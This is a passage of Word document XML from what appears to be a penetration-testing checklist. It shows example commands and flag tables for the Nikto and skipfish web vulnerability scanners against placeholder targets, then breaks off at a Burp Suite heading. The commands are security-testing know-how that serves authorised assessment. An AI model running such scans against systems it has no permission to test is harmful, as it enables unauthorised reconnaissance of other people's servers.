              <w:t>Nikto, also known as Nikto2, is an open source (GPL) and free-to-use web server scanner which performs vulnerability scanning against web servers for multiple items including dangerous files and programs, and checks for outdated versions of web server software. It also checks for server configuration errors and any possible vulnerabilities they might have introduced.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="500320B2" w14:textId="2EF4532E" w:rsidR="009C1273" w:rsidRPr="00F52BA1" w:rsidRDefault="009C1273" w:rsidP="0043739D">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:br/>
              <w:t>The most basic way to use nikto to scan a network would be to use:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00276437">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">nikto </w:t>
            </w:r>
            <w:r w:rsidRPr="00276437">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-h </w:t>
            </w:r>
            <w:r w:rsidRPr="00276437">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>TARGET.IP.ADD.RESS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A50AEB">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-h</w:t>
            </w:r>
            <w:r w:rsidRPr="00A50AEB">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A50AEB">
              <w:t>Specify a host</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A50AEB">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-s</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidRPr="00A50AEB">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>l</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Force ssl mode</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F52BA1">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-port </w:t>
            </w:r>
            <w:r w:rsidRPr="009C1273">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Specify a port number</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00685FA2">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-nocac</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>h</w:t>
            </w:r>
            <w:r w:rsidRPr="00685FA2">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>e</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Force no cached pages</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00685FA2">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-id </w:t>
            </w:r>
            <w:r w:rsidRPr="00685FA2">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>USER:PASS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00685FA2">
              <w:t>Allow Nikto to use credentials</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00685FA2">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-IgnoreCode</w:t>
            </w:r>
            <w:r w:rsidRPr="00685FA2">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> 301</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Ignore certain HTTP codes such as 301 redirects</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C1273" w14:paraId="06AE7ECD" w14:textId="77777777" w:rsidTr="009C1273">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="17E6DF3C" w14:textId="23BAF7F2" w:rsidR="009C1273" w:rsidRDefault="009C1273" w:rsidP="0043739D">
            <w:r>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="003C01E2">
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0F0EC56F" w14:textId="77777777" w:rsidR="009C1273" w:rsidRDefault="009C1273" w:rsidP="0043739D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6795FA7B" w14:textId="77777777" w:rsidR="009C1273" w:rsidRDefault="009C1273" w:rsidP="00AA20B4">
            <w:r w:rsidRPr="009C1273">
              <w:t>A tuning scan can be used to decrease the number of tests performed against a target. By specifying the type of test to include or exclude, faster and focused testing can be completed. This is useful in situations where the presence of certain file types such as XSS or simply “interesting” files is undesired.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44B8F57C" w14:textId="064E8131" w:rsidR="009C1273" w:rsidRPr="009C1273" w:rsidRDefault="009C1273" w:rsidP="00AA20B4">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009C1273">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>nikto</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009C1273">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-h</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009C1273">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">TARGET.IP.ADD.RESS </w:t>
            </w:r>
            <w:r w:rsidRPr="009C1273">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-Tuning x</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009C1273">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-Tuning x</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Reverse tuning options</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C1273" w14:paraId="6D955784" w14:textId="77777777" w:rsidTr="009C1273">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="4632B5E4" w14:textId="233FEF44" w:rsidR="009C1273" w:rsidRDefault="009C1273" w:rsidP="0043739D">
            <w:r>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="003C01E2">
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:t>.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2278D5DB" w14:textId="77777777" w:rsidR="009C1273" w:rsidRDefault="009C1273" w:rsidP="0043739D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="10B0E6DD" w14:textId="368778EE" w:rsidR="009C1273" w:rsidRPr="009C1273" w:rsidRDefault="00C348F4" w:rsidP="00AA20B4">
            <w:r>
              <w:t>Common Gateway Interface directories can also be searched using a flag and filter:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C348F4">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>nikto</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00C348F4">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-h </w:t>
            </w:r>
            <w:r w:rsidRPr="00C348F4">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">TARGET.IP.ADD.RESS </w:t>
            </w:r>
            <w:r w:rsidRPr="00C348F4">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-Cgidirs </w:t>
            </w:r>
            <w:r w:rsidRPr="00C348F4">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>all</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C348F4">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-Cgidirs </w:t>
            </w:r>
            <w:r w:rsidRPr="00C348F4">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>all</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Scan all CGI directories</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C348F4">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-Cgidirs </w:t>
            </w:r>
            <w:r w:rsidRPr="00C348F4">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>none</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Scan none</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00562167" w14:paraId="765684DB" w14:textId="77777777" w:rsidTr="009C1273">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="3A0347DF" w14:textId="7F8E830C" w:rsidR="00562167" w:rsidRDefault="00562167" w:rsidP="0043739D">
            <w:r>
              <w:t>46.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2AE903A4" w14:textId="6FDC8B4E" w:rsidR="00562167" w:rsidRDefault="00562167" w:rsidP="0043739D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>skipfish</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="002024A0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>skipfish</w:t>
            </w:r>
            <w:r w:rsidRPr="002024A0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> is already installed on Kali Linux)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7F936353" w14:textId="77777777" w:rsidR="00562167" w:rsidRPr="004E53E1" w:rsidRDefault="00562167" w:rsidP="00625824">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004E53E1">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>IF THERE IS A WEBSITE ASSOCIATED WITH THE IP ADDRESS. OTHERWISE, SKIP.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3359D1FD" w14:textId="2D1CE532" w:rsidR="00562167" w:rsidRDefault="00562167" w:rsidP="00AA20B4">
            <w:r w:rsidRPr="00625824">
              <w:t>Skipfish is an active web application security reconnaissance tool. It prepares an interactive sitemap for the targeted site by carrying out a recursive crawl and dictionary-based probes. The resulting map is then annotated with the output from a number of active (but hopefully non-disruptive) security checks. The final report generated by the tool is meant to serve as a foundation for professional web application security assessments.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00625824">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>skipfish</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00471F2F">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-o </w:t>
            </w:r>
            <w:r w:rsidRPr="00471F2F">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>~/REPORT</w:t>
            </w:r>
            <w:r w:rsidRPr="00471F2F">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> -W </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>WORDLIST</w:t>
            </w:r>
            <w:r w:rsidRPr="00471F2F">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00625824">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-A </w:t>
            </w:r>
            <w:r w:rsidRPr="00625824">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>USER</w:t>
            </w:r>
            <w:r w:rsidRPr="00625824">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00625824">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>PASS</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00625824">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>http://TARGET.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="483D64F2" w14:textId="5D502663" w:rsidR="00562167" w:rsidRDefault="00562167" w:rsidP="00562167">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00471F2F">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-o</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Output to a file</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00471F2F">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-A </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:t>Use credentials</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00471F2F">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-W</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Specifiy a wordlist</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3FCA">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-N</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Reject new cookies</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00471F2F">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-C </w:t>
            </w:r>
            <w:r w:rsidRPr="00471F2F">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>NAME</w:t>
            </w:r>
            <w:r w:rsidRPr="00471F2F">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00471F2F">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>VALUE</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Append a custom cookie to all requests</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3FCA">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-b </w:t>
            </w:r>
            <w:r>
              <w:t>&lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008B3FCA">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:r>
              <w:t>|</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3FCA">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>f</w:t>
            </w:r>
            <w:r>
              <w:t>|</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3FCA">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>p</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>User agent can be set to Int Ex, Fire Fox or iPhone.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3FCA">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-M</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Useful for SSL-only sites</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>-v</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Verbose (run with -u)</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3FCA">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-u</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Quiet mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00562167" w14:paraId="28EE59D5" w14:textId="77777777" w:rsidTr="009C1273">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="1BADB5C0" w14:textId="1C1485CE" w:rsidR="00562167" w:rsidRDefault="00EA7204" w:rsidP="0043739D">
            <w:r>
              <w:t>46.e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7222508D" w14:textId="77777777" w:rsidR="00562167" w:rsidRDefault="00562167" w:rsidP="0043739D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="29792E34" w14:textId="738A96F5" w:rsidR="00562167" w:rsidRPr="00562167" w:rsidRDefault="00562167" w:rsidP="00625824">
            <w:r>
              <w:t xml:space="preserve">When using the -W flag, the recommended and included dictionary file is: </w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00562167">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/usr/share/skipfish/dictionaries/complete.wl</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0038011E" w14:paraId="72AAA8CB" w14:textId="77777777" w:rsidTr="009C1273">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="58B7E099" w14:textId="77777777" w:rsidR="0038011E" w:rsidRDefault="0038011E" w:rsidP="0043739D"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2130441F" w14:textId="77777777" w:rsidR="0038011E" w:rsidRDefault="0038011E" w:rsidP="0043739D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="53B21A60" w14:textId="77777777" w:rsidR="0038011E" w:rsidRPr="000C65EE" w:rsidRDefault="0038011E" w:rsidP="0043739D"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0C246656" w14:textId="77777777" w:rsidR="0038011E" w:rsidRDefault="0038011E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3CD992" w14:textId="52634092" w:rsidR="008B4947" w:rsidRDefault="002024A0" w:rsidP="008B4947">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Port, Service and Web Page Scanning: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC7CB4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Burp Suite</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="976"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="611"/>
        <w:gridCol w:w="2397"/>
        <w:gridCol w:w="8019"/>
      </w:tblGrid>
      <w:tr w:rsidR="003A4077" w14:paraId="07D4EDA5" w14:textId="77777777" w:rsidTr="003A4077">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="0EB89CF1" w14:textId="0ABF876E" w:rsidR="003A4077" w:rsidRDefault="003A4077" w:rsidP="003A4077">
            <w:r>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="003C01E2">
              <w:t>7</w:t>
            </w:r>
